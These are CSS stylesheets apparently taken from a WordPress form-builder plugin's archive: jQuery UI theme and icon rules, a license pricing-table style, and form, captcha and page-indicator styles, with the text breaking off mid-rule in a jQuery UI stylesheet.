.wdform_table1 .ui-state-focus .ui-icon {
	background-image: url(images/ui-icons_454545_256x240.png);
}
.wdform_table1 .ui-state-active .ui-icon {
	background-image: url(images/ui-icons_454545_256x240.png);
}
.wdform_table1 .ui-state-highlight .ui-icon {
	background-image: url(images/ui-icons_2e83ff_256x240.png);
}
.wdform_table1 .ui-state-error .ui-icon,
.wdform_table1 .ui-state-error-text .ui-icon {
	background-image: url(images/ui-icons_cd0a0a_256x240.png);
}

/* positioning */
.wdform_table1 .ui-icon-blank { background-position: 16px 16px; }
.wdform_table1 .ui-icon-carat-1-n { background-position: 0 0; }
.wdform_table1 .ui-icon-carat-1-ne { background-position: -16px 0; }
.wdform_table1 .ui-icon-carat-1-e { background-position: -32px 0; }
.wdform_table1 .ui-icon-carat-1-se { background-position: -48px 0; }
.wdform_table1 .ui-icon-carat-1-s { background-position: -64px 0; }
.wdform_table1 .ui-icon-carat-1-sw { background-position: -80px 0; }
.wdform_table1 .ui-icon-carat-1-w { background-position: -96px 0; }
.wdform_table1 .ui-icon-carat-1-nw { background-position: -112px 0; }
.wdform_table1 .ui-icon-carat-2-n-s { background-position: -128px 0; }
.wdform_table1 .ui-icon-carat-2-e-w { background-position: -144px 0; }
.wdform_table1 .ui-icon-triangle-1-n { background-position: 0 -16px; }
.wdform_table1 .ui-icon-triangle-1-ne { background-position: -16px -16px; }
.wdform_table1 .ui-icon-triangle-1-e { background-position: -32px -16px; }
.wdform_table1 .ui-icon-triangle-1-se { background-position: -48px -16px; }
.wdform_table1 .ui-icon-triangle-1-s { background-position: -64px -16px; }
.wdform_table1 .ui-icon-triangle-1-sw { background-position: -80px -16px; }
.wdform_table1 .ui-icon-triangle-1-w { background-position: -96px -16px; }
.wdform_table1 .ui-icon-triangle-1-nw { background-position: -112px -16px; }
.wdform_table1 .ui-icon-triangle-2-n-s { background-position: -128px -16px; }
.wdform_table1 .ui-icon-triangle-2-e-w { background-position: -144px -16px; }
.wdform_table1 .ui-icon-arrow-1-n { background-position: 0 -32px; }
.wdform_table1 .ui-icon-arrow-1-ne { background-position: -16px -32px; }
.wdform_table1 .ui-icon-arrow-1-e { background-position: -32px -32px; }
.wdform_table1 .ui-icon-arrow-1-se { background-position: -48px -32px; }
.wdform_table1 .ui-icon-arrow-1-s { background-position: -64px -32px; }
.wdform_table1 .ui-icon-arrow-1-sw { background-position: -80px -32px; }
.wdform_table1 .ui-icon-arrow-1-w { background-position: -96px -32px; }
.wdform_table1 .ui-icon-arrow-1-nw { background-position: -112px -32px; }
.wdform_table1 .ui-icon-arrow-2-n-s { background-position: -128px -32px; }
.wdform_table1 .ui-icon-arrow-2-ne-sw { background-position: -144px -32px; }
.wdform_table1 .ui-icon-arrow-2-e-w { background-position: -160px -32px; }
.wdform_table1 .ui-icon-arrow-2-se-nw { background-position: -176px -32px; }
.wdform_table1 .ui-icon-arrowstop-1-n { background-position: -192px -32px; }
.wdform_table1 .ui-icon-arrowstop-1-e { background-position: -208px -32px; }
.wdform_table1 .ui-icon-arrowstop-1-s { background-position: -224px -32px; }
.wdform_table1 .ui-icon-arrowstop-1-w { background-position: -240px -32px; }
.wdform_table1 .ui-icon-arrowthick-1-n { background-position: 0 -48px; }
.wdform_table1 .ui-icon-arrowthick-1-ne { background-position: -16px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-e { background-position: -32px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-se { background-position: -48px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-s { background-position: -64px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-sw { background-position: -80px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-w { background-position: -96px -48px; }
.wdform_table1 .ui-icon-arrowthick-1-nw { background-position: -112px -48px; }
.wdform_table1 .ui-icon-arrowthick-2-n-s { background-position: -128px -48px; }
.wdform_table1 .ui-icon-arrowthick-2-ne-sw { background-position: -144px -48px; }
.wdform_table1 .ui-icon-arrowthick-2-e-w { background-position: -160px -48px; }
.wdform_table1 .ui-icon-arrowthick-2-se-nw { background-position: -176px -48px; }
.wdform_table1 .ui-icon-arrowthickstop-1-n { background-position: -192px -48px; }
.wdform_table1 .ui-icon-arrowthickstop-1-e { background-position: -208px -48px; }
.wdform_table1 .ui-icon-arrowthickstop-1-s { background-position: -224px -48px; }
.wdform_table1 .ui-icon-arrowthickstop-1-w { background-position: -240px -48px; }
.wdform_table1 .ui-icon-arrowreturnthick-1-w { background-position: 0 -64px; }
.wdform_table1 .ui-icon-arrowreturnthick-1-n { background-position: -16px -64px; }
.wdform_table1 .ui-icon-arrowreturnthick-1-e { background-position: -32px -64px; }
.wdform_table1 .ui-icon-arrowreturnthick-1-s { background-position: -48px -64px; }
.wdform_table1 .ui-icon-arrowreturn-1-w { background-position: -64px -64px; }
.wdform_table1 .ui-icon-arrowreturn-1-n { background-position: -80px -64px; }
.wdform_table1 .ui-icon-arrowreturn-1-e { background-position: -96px -64px; }
.wdform_table1 .ui-icon-arrowreturn-1-s { background-position: -112px -64px; }
.wdform_table1 .ui-icon-arrowrefresh-1-w { background-position: -128px -64px; }
.wdform_table1 .ui-icon-arrowrefresh-1-n { background-position: -144px -64px; }
.wdform_table1 .ui-icon-arrowrefresh-1-e { background-position: -160px -64px; }
.wdform_table1 .ui-icon-arrowrefresh-1-s { background-position: -176px -64px; }
.wdform_table1 .ui-icon-arrow-4 { background-position: 0 -80px; }
.wdform_table1 .ui-icon-arrow-4-diag { background-position: -16px -80px; }
.wdform_table1 .ui-icon-extlink { background-position: -32px -80px; }
.wdform_table1 .ui-icon-newwin { background-position: -48px -80px; }
.wdform_table1 .ui-icon-refresh { background-position: -64px -80px; }
.wdform_table1 .ui-icon-shuffle { background-position: -80px -80px; }
.wdform_table1 .ui-icon-transfer-e-w { background-position: -96px -80px; }
.wdform_table1 .ui-icon-transferthick-e-w { background-position: -112px -80px; }
.wdform_table1 .ui-icon-folder-collapsed { background-position: 0 -96px; }
.wdform_table1 .ui-icon-folder-open { background-position: -16px -96px; }
.wdform_table1 .ui-icon-document { background-position: -32px -96px; }
.wdform_table1 .ui-icon-document-b { background-position: -48px -96px; }
.wdform_table1 .ui-icon-note { background-position: -64px -96px; }
.wdform_table1 .ui-icon-mail-closed { background-position: -80px -96px; }
.wdform_table1 .ui-icon-mail-open { background-position: -96px -96px; }
.wdform_table1 .ui-icon-suitcase { background-position: -112px -96px; }
.wdform_table1 .ui-icon-comment { background-position: -128px -96px; }
.wdform_table1 .ui-icon-person { background-position: -144px -96px; }
.wdform_table1 .ui-icon-print { background-position: -160px -96px; }
.wdform_table1 .ui-icon-trash { background-position: -176px -96px; }
.wdform_table1 .ui-icon-locked { background-position: -192px -96px; }
.wdform_table1 .ui-icon-unlocked { background-position: -208px -96px; }
.wdform_table1 .ui-icon-bookmark { background-position: -224px -96px; }
.wdform_table1 .ui-icon-tag { background-position: -240px -96px; }
.wdform_table1 .ui-icon-home { background-position: 0 -112px; }
.wdform_table1 .ui-icon-flag { background-position: -16px -112px; }
.wdform_table1 .ui-icon-calendar { background-position: -32px -112px; }
.wdform_table1 .ui-icon-cart { background-position: -48px -112px; }
.wdform_table1 .ui-icon-pencil { background-position: -64px -112px; }
.wdform_table1 .ui-icon-clock { background-position: -80px -112px; }
.wdform_table1 .ui-icon-disk { background-position: -96px -112px; }
.wdform_table1 .ui-icon-calculator { background-position: -112px -112px; }
.wdform_table1 .ui-icon-zoomin { background-position: -128px -112px; }
.wdform_table1 .ui-icon-zoomout { background-position: -144px -112px; }
.wdform_table1 .ui-icon-search { background-position: -160px -112px; }
.wdform_table1 .ui-icon-wrench { background-position: -176px -112px; }
.wdform_table1 .ui-icon-gear { background-position: -192px -112px; }
.wdform_table1 .ui-icon-heart { background-position: -208px -112px; }
.wdform_table1 .ui-icon-star { background-position: -224px -112px; }
.wdform_table1 .ui-icon-link { background-position: -240px -112px; }
.wdform_table1 .ui-icon-cancel { background-position: 0 -128px; }
.wdform_table1 .ui-icon-plus { background-position: -16px -128px; }
.wdform_table1 .ui-icon-plusthick { background-position: -32px -128px; }
.wdform_table1 .ui-icon-minus { background-position: -48px -128px; }
.wdform_table1 .ui-icon-minusthick { background-position: -64px -128px; }
.wdform_table1 .ui-icon-close { background-position: -80px -128px; }
.wdform_table1 .ui-icon-closethick { background-position: -96px -128px; }
.wdform_table1 .ui-icon-key { background-position: -112px -128px; }
.wdform_table1 .ui-icon-lightbulb { background-position: -128px -128px; }
.wdform_table1 .ui-icon-scissors { background-position: -144px -128px; }
.wdform_table1 .ui-icon-clipboard { background-position: -160px -128px; }
.wdform_table1 .ui-icon-copy { background-position: -176px -128px; }
.wdform_table1 .ui-icon-contact { background-position: -192px -128px; }
.wdform_table1 .ui-icon-image { background-position: -208px -128px; }
.wdform_table1 .ui-icon-video { background-position: -224px -128px; }
.wdform_table1 .ui-icon-script { background-position: -240px -128px; }
.wdform_table1 .ui-icon-alert { background-position: 0 -144px; }
.wdform_table1 .ui-icon-info { background-position: -16px -144px; }
.wdform_table1 .ui-icon-notice { background-position: -32px -144px; }
.wdform_table1 .ui-icon-help { background-position: -48px -144px; }
.wdform_table1 .ui-icon-check { background-position: -64px -144px; }
.wdform_table1 .ui-icon-bullet { background-position: -80px -144px; }
.wdform_table1 .ui-icon-radio-on { background-position: -96px -144px; }
.wdform_table1 .ui-icon-radio-off { background-position: -112px -144px; }
.wdform_table1 .ui-icon-pin-w { background-position: -128px -144px; }
.wdform_table1 .ui-icon-pin-s { background-position: -144px -144px; }
.wdform_table1 .ui-icon-play { background-position: 0 -160px; }
.wdform_table1 .ui-icon-pause { background-position: -16px -160px; }
.wdform_table1 .ui-icon-seek-next { background-position: -32px -160px; }
.wdform_table1 .ui-icon-seek-prev { background-position: -48px -160px; }
.wdform_table1 .ui-icon-seek-end { background-position: -64px -160px; }
.wdform_table1 .ui-icon-seek-start { background-position: -80px -160px; }
/* .wdform_table1 ui-icon-seek-first is deprecated, use ui-icon-seek-start instead */
.wdform_table1 .ui-icon-seek-first { background-position: -80px -160px; }
.wdform_table1 .ui-icon-stop { background-position: -96px -160px; }
.wdform_table1 .ui-icon-eject { background-position: -112px -160px; }
.wdform_table1 .ui-icon-volume-off { background-position: -128px -160px; }
.wdform_table1 .ui-icon-volume-on { background-position: -144px -160px; }
.wdform_table1 .ui-icon-power { background-position: 0 -176px; }
.wdform_table1 .ui-icon-signal-diag { background-position: -16px -176px; }
.wdform_table1 .ui-icon-signal { background-position: -32px -176px; }
.wdform_table1 .ui-icon-battery-0 { background-position: -48px -176px; }
.wdform_table1 .ui-icon-battery-1 { background-position: -64px -176px; }
.wdform_table1 .ui-icon-battery-2 { background-position: -80px -176px; }
.wdform_table1 .ui-icon-battery-3 { background-position: -96px -176px; }
.wdform_table1 .ui-icon-circle-plus { background-position: 0 -192px; }
.wdform_table1 .ui-icon-circle-minus { background-position: -16px -192px; }
.wdform_table1 .ui-icon-circle-close { background-position: -32px -192px; }
.wdform_table1 .ui-icon-circle-triangle-e { background-position: -48px -192px; }
.wdform_table1 .ui-icon-circle-triangle-s { background-position: -64px -192px; }
.wdform_table1 .ui-icon-circle-triangle-w { background-position: -80px -192px; }
.wdform_table1 .ui-icon-circle-triangle-n { background-position: -96px -192px; }
.wdform_table1 .ui-icon-circle-arrow-e { background-position: -112px -192px; }
.wdform_table1 .ui-icon-circle-arrow-s { background-position: -128px -192px; }
.wdform_table1 .ui-icon-circle-arrow-w { background-position: -144px -192px; }
.wdform_table1 .ui-icon-circle-arrow-n { background-position: -160px -192px; }
.wdform_table1 .ui-icon-circle-zoomin { background-position: -176px -192px; }
.wdform_table1 .ui-icon-circle-zoomout { background-position: -192px -192px; }
.wdform_table1 .ui-icon-circle-check { background-position: -208px -192px; }
.wdform_table1 .ui-icon-circlesmall-plus { background-position: 0 -208px; }
.wdform_table1 .ui-icon-circlesmall-minus { background-position: -16px -208px; }
.wdform_table1 .ui-icon-circlesmall-close { background-position: -32px -208px; }
.wdform_table1 .ui-icon-squaresmall-plus { background-position: -48px -208px; }
.wdform_table1 .ui-icon-squaresmall-minus { background-position: -64px -208px; }
.wdform_table1 .ui-icon-squaresmall-close { background-position: -80px -208px; }
.wdform_table1 .ui-icon-grip-dotted-vertical { background-position: 0 -224px; }
.wdform_table1 .ui-icon-grip-dotted-horizontal { background-position: -16px -224px; }
.wdform_table1 .ui-icon-grip-solid-vertical { background-position: -32px -224px; }
.wdform_table1 .ui-icon-grip-solid-horizontal { background-position: -48px -224px; }
.wdform_table1 .ui-icon-gripsmall-diagonal-se { background-position: -64px -224px; }
.wdform_table1 .ui-icon-grip-diagonal-se { background-position: -80px -224px; }


/* Misc visuals
----------------------------------*/

/* Corner radius */
.wdform_table1 .ui-corner-all,
.wdform_table1 .ui-corner-top,
.wdform_table1 .ui-corner-left,
.wdform_table1 .ui-corner-tl {
	border-top-left-radius: 4px;
}
.wdform_table1 .ui-corner-all,
.wdform_table1 .ui-corner-top,
.wdform_table1 .ui-corner-right,
.wdform_table1 .ui-corner-tr {
	border-top-right-radius: 4px;
}
.wdform_table1 .ui-corner-all,
.wdform_table1 .ui-corner-bottom,
.wdform_table1 .ui-corner-left,
.wdform_table1 .ui-corner-bl {
	border-bottom-left-radius: 4px;
}
.wdform_table1 .ui-corner-all,
.wdform_table1 .ui-corner-bottom,
.wdform_table1 .ui-corner-right,
.wdform_table1 .ui-corner-br {
	border-bottom-right-radius: 4px;
}

/* Overlays */
.wdform_table1 .ui-widget-overlay {
	background: #aaaaaa url(images/ui-bg_flat_0_aaaaaa_40x100.png) 50% 50% repeat-x;
	opacity: .3;
	filter: Alpha(Opacity=30);
}
.wdform_table1 .ui-widget-shadow {
	margin: -8px 0 0 -8px;
	padding: 8px;
	background: #aaaaaa url(images/ui-bg_flat_0_aaaaaa_40x100.png) 50% 50% repeat-x;
	opacity: .3;
	filter: Alpha(Opacity=30);
	border-radius: 8px;
}
css/license.css000060400000006322152434416630007477 0ustar00div#featurs_tables {
  display: inline-block;
  font-size: 13px;
  padding-top: 95px;
  text-align: left;
  float: left;
}

div#featurs_tables div {
  vertical-align: top;
}

div#featurs_table1 {
  background-color: rgb(254, 254, 254);
  display: inline-block;
  position: relative;
  vertical-align: top;
  width: 330px;
   height: 228px;
  z-index: 10;
}

div#featurs_table1 span::after {
 //background-image: url("../images/arrow3.png");
 //background-position: center center;
 //background-repeat: no-repeat;
  content: "";
  display: inline-block;
  float: right;
  height: 37px;
  position: relative;
  right: -21px;
  top: -8px;
  width: 26px;
}

div#featurs_table1 span {
  border-left: 1px solid #e5e5e5;
  border-right: 1px solid #e5e5e5;
  border-top: 1px solid #e5e5e5;
  color: #545454;
  display: block;
  height: 21px;
  padding: 8px;
  text-align: left;
}

div#featurs_table1 span:last-child,
div#featurs_table2 span:last-child,
div#featurs_table3 span:last-child {
  border-bottom: 1px solid #e5e5e5;
}

div#featurs_table2 {
  background-color: rgba(255, 255, 255, 0.9);
  display: inline-block;
  position: relative;
  top: -72px;
  width: 180px;
}

div#featurs_table2 span:first-child,
div#featurs_table3 span:first-child {
  color: #000;
  font-size: 22px;
  font-weight: bold;
  padding-bottom: 14px;
  padding-top: 2px;
  border-top: 1px solid #e5e5e5;
  border-left: 1px solid #e5e5e5;
  border-right: 1px solid #e5e5e5;
  height: 39px;
  padding-top: 18px;
}

div#featurs_table2 span:first-child {
  border-left: 1px solid #e5e5e5 !important;
}

div#featurs_table2 span {
  border-left: none !important;
}

div#featurs_table2 span,
div#featurs_table3 span {
  border-top: 1px solid #e5e5e5;
  border-right: 1px solid #e5e5e5;
  border-left: 1px solid #e5e5e5;
  color: #545454;
  display: block;
  height: 21px;
  padding: 8px;
  text-align: center;
}

.download a {
  background-color: #fff;
  border: 6px solid #dddddd;
  border-radius: 50%;
  box-shadow: 0 0 0 7px #eeeeee;
  color: #21439c;
  cursor: pointer;
  display: inline-block;
  font-size: 14px;
  font-style: italic;
  font-weight: bold;
  margin-top: -4px;
  outline: 0 none;
  padding: 32px 9px 32px 2px;
  text-align: center;
  text-decoration: none;
  transition-duration: 0.6s;
  transition-property: border-color;
  transition-timing-function: linear;
  width: 72px;
}

div#featurs_table3 {
  background-color: rgba(255, 255, 255, 0.6);
  display: inline-block;
  position: relative;
  top: -72px;
  width: 180px;
}

div#featurs_table2 span.yes,
div#featurs_table3 span.yes {
  background-image: url("../images/lic_plus.png");
  background-position: center center;
  background-repeat: no-repeat;
}

span.no {
  background-image: url("../images/lic_minus.png");
  background-position: center center;
  background-repeat: no-repeat;
}

.download input[type="submit"]:hover,
.download a:hover {
  border-color: #F4762A;
}

#featurs_tables span.download {
  height: 40px !important;
  border-bottom: 1px solid #e5e5e5 !important;
  border-left: 1px solid #e5e5e5 !important;
}

.price_big {
  color: #F47629;
  font-size: 22px;
}

.price {
  display: block;
  color: #F47629;
}

.fm-get-pro{
	background: url("../images/buttons.png") no-repeat 15% 100%;
    width: 148px;
    height: 49px;
}
css/form_maker_first.css000060400000005050152434416630011403 0ustar00.wdform-page-and-images {
	color: #000000;
	font-size: 14px;
	font-weight: normal;
	width: 100%;
}

.wdform_table1 {
	color: #000000;
	font-size: 14px;
	font-weight: normal;
	width: 100%;
}

.wdform_tbody1 {
	float: left;
}

.wdform_table2 {
	border-collapse: separate !important;
	border-spacing: 0px;
	float: left;
	padding-right: 50px !important;
}

.time_box {
	border-width: 1px;
	margin: 0px;
	padding: 2px;
	text-align: right;
	vertical-align: middle;
	width: 30px !important;
}

.wdform-date {
	width: 100px !important;
}

.mini_label {
	font-family: 'Lucida Grande', Tahoma, Arial, Verdana, sans-serif;
	font-size: 10px;
}

.label {
	border: none;
}

.td_am_pm_select {
	padding-left: 5px;
}

.am_pm_select {
	height: 16px;
	margin: 0;
	padding: 0
}

.input_deactive {
	border-width: 1px;
	color: #999999;
	font-style: italic;
}

.input_active {
	border-width: 1px;
	color: #000000;
	font-style: normal;
}

.required {
	border: none;
	color: red
}

.captcha_img {
	border-width: 0px;
	cursor: pointer;
	margin: 0px;
	padding: 0px;
}

.captcha_refresh {
	background-image: url("../images/refresh_black.png");
	border-width: 0px;
	cursor: pointer;
	height: 30px;
	margin: 0px;
	padding: 0px;
	vertical-align: middle;
	width: 30px;
}

.captcha_input {
	border-width: 1px;
	height: 20px;
	margin: 0px;
	padding: 0px;
	vertical-align: middle;
}

.arithmetic_captcha_img {
	border-width: 0px;
	cursor: pointer;
	margin: 0px;
	padding: 0px;
	vertical-align: middle;
}

.arithmetic_captcha_input {
	border-width: 1px;
	height: 25px;
	margin-left: 3px;
	padding: 0px;
	vertical-align: middle;
}

.file_upload {
	border-width: 1px;
	margin: 0px;
	padding: 0px;
}    

.page_deactive {
	border: 1px solid #BFBEBE;
	cursor: pointer;
	border-radius: 15px;
	padding: 2px 8px;
}

.page_deactive:hover {
	background-color: #F0F0F0;
}

.page_active {
	background-color: #4EC0D9;
    cursor: pointer;
    padding: 2px 8px;
    margin: 4px;
    cursor: pointer;
    border-radius: 15px;
    padding: 3px 9px;
    color: #fff;
}

.page_percentage_active {
    background-color: #4EC0D9;
    border-radius: 30px;
    border-spacing: 0px;
    height: 30px;
    line-height: 29px;
    float: left;
    font-size: 15px;
    margin: 0px;
    padding: 0px;
    text-align: right !important;
    color: #4EC0D9;
}

.page_percentage_active b{
    padding: 4px 15px;
    background: #fff;
    border-radius: 18px;
    margin: 3px;
}	

.page_percentage_deactive {
	background-color: white;
	border: 1px solid #ABA8A8;
	border-radius: 30px;
	height: 30px;
	line-height: 30px;
	text-align: left !important; 
	width: 100%;
}css/jquery-ui-1.10.3.custom.css000060400000076714152434416630012052 0ustar00/*! jQuery UI - v1.10.3 - 2013-10-19
* http://jqueryui.com
* Includes: jquery.ui.core.css, jquery.ui.resizable.css, jquery.ui.selectable.css, jquery.ui.accordion.css, jquery.ui.autocomplete.css, jquery.ui.button.css, jquery.ui.datepicker.css, jquery.ui.dialog.css, jquery.ui.menu.css, jquery.ui.progressbar.css, jquery.ui.slider.css, jquery.ui.spinner.css, jquery.ui.tabs.css, jquery.ui.tooltip.css, jquery.ui.theme.css
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Trebuchet%20MS%2CTahoma%2CVerdana%2CArial%2Csans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=gloss_wave&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=highlight_soft&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=glass&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=glass&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=glass&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=highlight_soft&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=diagonals_thick&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=diagonals_thick&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=flat&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
* Copyright 2013 jQuery Foundation and other contributors; Licensed MIT */

/* Layout helpers
----------------------------------*/
.ui-helper-hidden {
	display: none;
}
.ui-helper-hidden-accessible {
	border: 0;
	clip: rect(0 0 0 0);
	height: 1px;
	margin: -1px;
	overflow: hidden;
	padding: 0;
	position: absolute;
	width: 1px;
}
.ui-helper-reset {
	margin: 0;
	padding: 0;
	border: 0;
	outline: 0;
	line-height: 1.3;
	text-decoration: none;
	font-size: 100%;
	list-style: none;
}
.ui-helper-clearfix:before,
.ui-helper-clearfix:after {
	content: "";
	display: table;
	border-collapse: collapse;
}
.ui-helper-clearfix:after {
	clear: both;
}
.ui-helper-clearfix {
	min-height: 0; /* support: IE7 */
}
.ui-helper-zfix {
	width: 100%;
	height: 100%;
	top: 0;
	left: 0;
	position: absolute;
	opacity: 0;
	filter:Alpha(Opacity=0);
}

.ui-front {
	z-index: 100;
}


/* Interaction Cues
----------------------------------*/
.ui-state-disabled {
	cursor: default !important;
}


/* Icons
----------------------------------*/

/* states and images */
.ui-icon {
	display: block;
	text-indent: -99999px;
	overflow: hidden;
	background-repeat: no-repeat;
}


/* Misc visuals
----------------------------------*/

/* Overlays */
.ui-widget-overlay {
	position: fixed;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
}
.ui-resizable {
	position: relative;
}
.ui-resizable-handle {
	position: absolute;
	font-size: 0.1px;
	display: block;
}
.ui-resizable-disabled .ui-resizable-handle,
.ui-resizable-autohide .ui-resizable-handle {
	display: none;
}
.ui-resizable-n {
	cursor: n-resize;
	height: 7px;
	width: 100%;
	top: -5px;
	left: 0;
}
.ui-resizable-s {
	cursor: s-resize;
	height: 7px;
	width: 100%;
	bottom: -5px;
	left: 0;
}
.ui-resizable-e {
	cursor: e-resize;
	width: 7px;
	right: -5px;
	top: 0;
	height: 100%;
}
.ui-resizable-w {
	cursor: w-resize;
	width: 7px;
	left: -5px;
	top: 0;
	height: 100%;
}
.ui-resizable-se {
	cursor: se-resize;
	width: 12px;
	height: 12px;
	right: 1px;
	bottom: 1px;
}
.ui-resizable-sw {
	cursor: sw-resize;
	width: 9px;
	height: 9px;
	left: -5px;
	bottom: -5px;
}
.ui-resizable-nw {
	cursor: nw-resize;
	width: 9px;
	height: 9px;
	left: -5px;
	top: -5px;
}
.ui-resizable-ne {
	cursor: ne-resize;
	width: 9px;
	height: 9px;
	right: -5px;
	top: -5px;
}
.ui-selectable-helper {
	position: absolute;
	z-index: 100;
	border: 1px dotted black;
}
.ui-accordion .ui-accordion-header {
	display: block;
	cursor: pointer;
	position: relative;
	margin-top: 2px;
	padding: .5em .5em .5em .7em;
	min-height: 0; /* support: IE7 */
}
.ui-accordion .ui-accordion-icons {
	padding-left: 2.2em;
}
.ui-accordion .ui-accordion-noicons {
	padding-left: .7em;
}
.ui-accordion .ui-accordion-icons .ui-accordion-icons {
	padding-left: 2.2em;
}
.ui-accordion .ui-accordion-header .ui-accordion-header-icon {
	position: absolute;
	left: .5em;
	top: 50%;
	margin-top: -8px;
}
.ui-accordion .ui-accordion-content {
	padding: 1em 2.2em;
	border-top: 0;
	overflow: auto;
}
.ui-autocomplete {
	position: absolute;
	top: 0;
	left: 0;
	cursor: default;
}
.ui-button {
	display: inline-block;
	position: relative;
	padding: 0;
	line-height: normal;
	margin-right: .1em;
	cursor: pointer;
	vertical-align: middle;
	text-align: center;
	overflow: visible; /* removes extra width in IE */
}
.ui-button,
.ui-button:link,
.ui-button:visited,
.ui-button:hover,
.ui-button:active {
	text-decoration: none;
}
/* to make room for the icon, a width needs to be set here */
.ui-button-icon-only {
	width: 2.2em;
}
/* button elements seem to need a little more width */
button.ui-button-icon-only {
	width: 2.4em;
}
.ui-button-icons-only {
	width: 3.4em;
}
button.ui-button-icons-only {
	width: 3.7em;
}

/* button text element */
.ui-button .ui-button-text {
	display: block;
	line-height: normal;
}
.ui-button-text-only .ui-button-text {
	padding: .4em 1em;
}
.ui-button-icon-only .ui-button-text,
.ui-button-icons-only .ui-button-text {
	padding: .4em;
	text-indent: -9999999px;
}
.ui-button-text-icon-primary .ui-button-text,
.ui-button-text-icons .ui-button-text {
	padding: .4em 1em .4em 2.1em;
}
.ui-button-text-icon-secondary .ui-button-text,
.ui-button-text-icons .ui-button-text {
	padding: .4em 2.1em .4em 1em;
}
.ui-button-text-icons .ui-button-text {
	padding-left: 2.1em;
	padding-right: 2.1em;
}
/* no icon support for input elements, provide padding by default */
input.ui-button {
	padding: .4em 1em;
}

/* button icon element(s) */
.ui-button-icon-only .ui-icon,
.ui-button-text-icon-primary .ui-icon,
.ui-button-text-icon-secondary .ui-icon,
.ui-button-text-icons .ui-icon,
.ui-button-icons-only .ui-icon {
	position: absolute;
	top: 50%;
	margin-top: -8px;
}
.ui-button-icon-only .ui-icon {
	left: 50%;
	margin-left: -8px;
}
.ui-button-text-icon-primary .ui-button-icon-primary,
.ui-button-text-icons .ui-button-icon-primary,
.ui-button-icons-only .ui-button-icon-primary {
	left: .5em;
}
.ui-button-text-icon-secondary .ui-button-icon-secondary,
.ui-button-text-icons .ui-button-icon-secondary,
.ui-button-icons-only .ui-button-icon-secondary {
	right: .5em;
}

/* button sets */
.ui-buttonset {
	margin-right: 7px;
}
.ui-buttonset .ui-button {
	margin-left: 0;
	margin-right: -.3em;
}

/* workarounds */
/* reset extra padding in Firefox, see h5bp.com/l */
input.ui-button::-moz-focus-inner,
button.ui-button::-moz-focus-inner {
	border: 0;
	padding: 0;
}
.ui-datepicker {
	width: 17em;
	padding: .2em .2em 0;
	display: none;
}
.ui-datepicker .ui-datepicker-header {
	position: relative;
	padding: .2em 0;
}
.ui-datepicker .ui-datepicker-prev,
.ui-datepicker .ui-datepicker-next {
	position: absolute;
	top: 2px;
	width: 1.8em;
	height: 1.8em;
}
.ui-datepicker .ui-datepicker-prev-hover,
.ui-datepicker .ui-datepicker-next-hover {
	top: 1px;
}
.ui-datepicker .ui-datepicker-prev {
	left: 2px;
}
.ui-datepicker .ui-datepicker-next {
	right: 2px;
}
.ui-datepicker .ui-datepicker-prev-hover {
	left: 1px;
}
.ui-datepicker .ui-datepicker-next-hover {
	right: 1px;
}
.ui-datepicker .ui-datepicker-prev span,
.ui-datepicker .ui-datepicker-next span {
	display: block;
	position: absolute;
	left: 50%;
	margin-left: -8px;
	top: 50%;
	margin-top: -8px;
}
.ui-datepicker .ui-datepicker-title {
	margin: 0 2.3em;
	line-height: 1.8em;
	text-align: center;
}
.ui-datepicker .ui-datepicker-title select {
	font-size: 1em;
	margin: 1px 0;
}
.ui-datepicker select.ui-datepicker-month-year {
	width: 100%;
}
.ui-datepicker select.ui-datepicker-month,
.ui-datepicker select.ui-datepicker-year {
	width: 49%;
}
.ui-datepicker table {
	width: 100%;
	font-size: .9em;
	border-collapse: collapse;
	margin: 0 0 .4em;
}
.ui-datepicker th {
	padding: .7em .3em;
	text-align: center;
	font-weight: bold;
	border: 0;
}
.ui-datepicker td {
	border: 0;
	padding: 1px;
}
.ui-datepicker td span,
.ui-datepicker td a {
	display: block;
	padding: .2em;
	text-align: right;
	text-decoration: none;
}
.ui-datepicker .ui-datepicker-buttonpane {
	background-image: none;
	margin: .7em 0 0 0;
	padding: 0 .2em;
	border-left: 0;
	border-right: 0;
	border-bottom: 0;
}
.ui-datepicker .ui-datepicker-buttonpane button {
	float: right;
	margin: .5em .2em .4em;
	cursor: pointer;
	padding: .2em .6em .3em .6em;
	width: auto;
	overflow: visible;
}
.ui-datepicker .ui-datepicker-buttonpane button.ui-datepicker-current {
	float: left;
}

/* with multiple calendars */
.ui-datepicker.ui-datepicker-multi {
	width: auto;
}
.ui-datepicker-multi .ui-datepicker-group {
	float: left;
}
.ui-datepicker-multi .ui-datepicker-group table {
	width: 95%;
	margin: 0 auto .4em;
}
.ui-datepicker-multi-2 .ui-datepicker-group {
	width: 50%;
}
.ui-datepicker-multi-3 .ui-datepicker-group {
	width: 33.3%;
}
.ui-datepicker-multi-4 .ui-datepicker-group {
	width: 25%;
}
.ui-datepicker-multi .ui-datepicker-group-last .ui-datepicker-header,
